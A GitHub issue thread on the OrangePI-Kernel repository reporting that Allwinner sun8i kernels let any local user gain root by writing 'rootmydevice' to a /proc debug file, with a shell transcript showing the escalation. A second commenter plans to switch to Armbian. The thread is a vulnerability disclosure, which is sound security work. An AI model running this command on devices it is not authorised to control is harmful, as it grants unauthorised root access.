OrangePI-Kernel icon indicating copy to clipboard operation
OrangePI-Kernel copied to clipboard

Local privileges escalation on sun8i

Open ThomasKaiser opened this issue 8 years ago • 1 comments

While I know that this repo isn't maintained since over half a year more like a reference. Seems like Allwinner's sun8i kernel sources allow everyone to become root easily:

tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)

ThomasKaiser avatar May 02 '16 05:05 ThomasKaiser

It's time to switch to armbian on my opi pc I guess.

betavr avatar May 13 '16 16:05 betavr